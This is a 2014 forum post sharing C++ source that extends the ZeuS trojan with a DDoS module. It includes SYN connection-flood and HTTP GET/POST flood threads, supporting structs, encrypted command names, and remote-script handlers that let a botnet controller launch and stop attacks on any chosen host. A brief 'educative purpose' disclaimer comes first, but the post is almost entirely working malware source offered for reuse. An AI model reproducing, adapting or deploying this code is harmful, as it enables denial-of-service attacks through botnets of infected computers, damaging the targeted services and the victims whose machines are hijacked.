Cartman. Posted June 27, 2014 Report Posted June 27, 2014 Here is some PoC sample how to modify ZeuS source to add dDoS function. This is just for educative purpose and not for illegal use.ddos.cpp#include <windows.h>#include <ws2tcpip.h>#include <wininet.h>#include "defines.h"#include "core.h"#include "ddos.h"#include "..\common\debug.h"#include "..\common\mem.h"#include "..\common\str.h"#include "..\common\wsocket.h"#include "..\common\wininet.h"#include "..\common\httptools.h"bool gl_bStopDdos;DWORD WINAPI synFlood(LPVOID lpParam){ DWORD dwTime; SOCKET sock[MAX_SYN_SOCKETS]; int iSockets; SSYNFlood s_sf = *((SSYNFlood *)lpParam); /* if (!CWA(ws2_32, gethostbyname)(s_sf.m_szHost)) { WDEBUG0(WDDT_ERROR, "SYN flooding failed !gethostbyname()"); return 0; } */ if(s_sf.m_nPort <= 0 || s_sf.m_nPort > 65535) s_sf.m_nPort = 80; gl_bStopDdos = false; WDEBUG5(WDDT_INFO, "SYN flooding host: %s, port: %u, sockets: %u, delay: %ums, time: %umin.", s_sf.m_szHost, s_sf.m_nPort, s_sf.m_nSockets, s_sf.m_nDelay, s_sf.m_dwTime); //dwTime = CWA(kernel32, GetTickCount)(); dwTime = GetTickCount(); while ((/*CWA(kernel32, GetTickCount)()*/ GetTickCount() - dwTime) <= (s_sf.m_dwTime * 60000) && gl_bStopDdos == false) { iSockets = 0; for (DWORD i = 0; i < s_sf.m_nSockets; i++) { sock[i] = WSocket::tcpConnectA(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), s_sf.m_nPort); if(sock[i] != INVALID_SOCKET) { WSocket::tcpDisableDelay(sock[i], true); WSocket::tcpSetKeepAlive(sock[i], true, 300000, 5000); iSockets++; }else{ break; } } //CWA(kernel32, Sleep)(s_sf.m_nDelay); Sleep(s_sf.m_nDelay); for (DWORD i = 0; i < iSockets; i++) { WSocket::tcpClose(sock[i]); } } WDEBUG2(WDDT_INFO, "finished SYN flooding target: %s, after: %d min", s_sf.m_szHost, (GetTickCount() - dwTime) / 60000); return 1;}DWORD WINAPI httpFlood(LPVOID lpParam){ SHTTPFlood s_hf = *((SHTTPFlood *)lpParam); Wininet::CALLURLDATA cud; //Mem::_zero(&cud, sizeof(Wininet::CALLURLDATA)); cud.bAutoProxy = true; cud.bTryCount = 1; cud.dwRetryDelay = 0; cud.hStopEvent = coreData.globalHandles.stopEvent; cud.pstrUserAgent = Wininet::_GetIEUserAgent(); cud.pstrURL = Str::_unicodeToAnsiEx(s_hf.m_szUrl, -1); cud.Connect_dwFlags = 0; cud.SendRequest_pstrReferer = NULL; cud.SendRequest_pPostData = s_hf.m_szPostData; cud.SendRequest_dwPostDataSize = Str::_LengthW(s_hf.m_szPostData); cud.SendRequest_dwFlags = s_hf.m_nWisrfMethod; cud.DownloadData_dwSizeLimit = 512 * 1024; cud.DownloadData_pstrFileName = NULL; //DWORD time = CWA(kernel32, GetTickCount)(); DWORD time = GetTickCount(); gl_bStopDdos = false; WDEBUG3(WDDT_INFO, "HTTP flooding host: %s, delay: %ums, times: %u", s_hf.m_szUrl, s_hf.m_nDelay, s_hf.m_nTimes); DWORD i; for (i = 0; i < s_hf.m_nTimes; i++) { if(gl_bStopDdos) { break; } Wininet::_CallURL(&cud, NULL); //CWA(kernel32, Sleep)(s_hf.m_nDelay); Sleep(s_hf.m_nDelay); } WDEBUG2(WDDT_INFO, "finished HTTP flooding target: %s, after: %u times", s_hf.m_szUrl, (i+1)); return 1;}ddos.h#pragma once#define MAX_SYN_SOCKETS 250typedef struct{ LPWSTR m_szHost; DWORD m_nPort; DWORD m_nSockets; DWORD m_nDelay; DWORD m_dwTime;}SSYNFlood;typedef struct{ LPWSTR m_szUrl; LPWSTR m_szPostData; DWORD m_nDelay; DWORD m_nTimes; DWORD m_nWisrfMethod;}SHTTPFlood;DWORD WINAPI httpFlood(LPVOID lpParam);DWORD WINAPI synFlood(LPVOID lpParam);extern bool gl_bStopDdos;cryptedsettings.txtremotescript_command_ddos_syn "ddos_syn"remotescript_command_ddos_http_post "ddos_http_post"remotescript_command_ddos_http_get "ddos_http_get"remotescript_command_ddos_stop "ddos_stop"cryptedsettings.h id_remotescript_command_ddos_syn, id_remotescript_command_ddos_http_post, id_remotescript_command_ddos_http_get, id_remotescript_command_ddos_stop, len_remotescript_command_ddos_syn = (8 + 1), len_remotescript_command_ddos_http_post = (14 + 1), len_remotescript_command_ddos_http_get = (13 + 1), len_remotescript_command_ddos_stop = (9 + 1), id_remotescript_command_ddos_syn, id_remotescript_command_ddos_http_post, id_remotescript_command_ddos_http_get, id_remotescript_command_ddos_stop,remotescripts:#include <ws2tcpip.h>#include "ddos.h"#include "..\common\wsocket.h"static bool ddosSyn(const LPWSTR *arguments, DWORD argumentsCount){ bool ok = false; SSYNFlood s_sf; if(argumentsCount >= 6) { s_sf.m_szHost = arguments[1]; s_sf.m_nPort = (DWORD)Str::_ToInt32W(arguments[2], NULL); s_sf.m_nSockets = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_sf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[4], NULL); s_sf.m_dwTime = (DWORD)Str::_ToInt32W(arguments[5], NULL); //if(CWA(ws2_32, getaddrinfo)(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), NULL, NULL, NULL)) //{ if(s_sf.m_nPort > 0 && s_sf.m_nSockets > 0 && s_sf.m_nSockets <= MAX_SYN_SOCKETS && s_sf.m_nDelay >= 0 && s_sf.m_dwTime > 0 && s_sf.m_szHost != NULL) { ok = true; }else{ WDEBUG0(WDDT_ERROR, "SYN flooding failed because invalid arguments"); } //}else{ // WDEBUG0(WDDT_ERROR, "SYN flooding failed !getaddrinfo()"); //} } if(ok) hSynFlood = CWA(kernel32, CreateThread)(NULL, 0, synFlood, &s_sf, 0, NULL); return ok;}static bool ddosHttp(const LPWSTR *arguments, DWORD argumentsCount, bool isPostRequest){ bool ok = false; SHTTPFlood s_hf; if(isPostRequest) { if(argumentsCount >= 5) { s_hf.m_nWisrfMethod = 1; //POST s_hf.m_szUrl = arguments[1]; s_hf.m_szPostData = arguments[2]; s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[4], NULL); ok = true; } }else{ if(argumentsCount >= 4) { s_hf.m_nWisrfMethod = 0; //GET s_hf.m_szUrl = arguments[1]; s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[2], NULL); s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_hf.m_szPostData = NULL; ok = true; } } if(ok) { if(s_hf.m_szUrl != NULL && s_hf.m_nDelay >= 0 && s_hf.m_nTimes > 0) hHttpFlood = CWA(kernel32, CreateThread)(NULL, 0, httpFlood, &s_hf, 0, NULL); } return ok;}static bool ddosHttpPost(const LPWSTR *arguments, DWORD argumentsCount){ return ddosHttp(arguments, argumentsCount, true);}static bool ddosHttpGet(const LPWSTR *arguments, DWORD argumentsCount){ return ddosHttp(arguments, argumentsCount, false);}static bool ddosStop(const LPWSTR *arguments, DWORD argumentsCount){ gl_bStopDdos = true; return true;} {CryptedStrings::id_remotescript_command_ddos_syn, ddosSyn}, {CryptedStrings::id_remotescript_command_ddos_http_post, ddosHttpPost}, {CryptedStrings::id_remotescript_command_ddos_http_get, ddosHttpGet}, {CryptedStrings::id_remotescript_command_ddos_stop, ddosStop}, Quote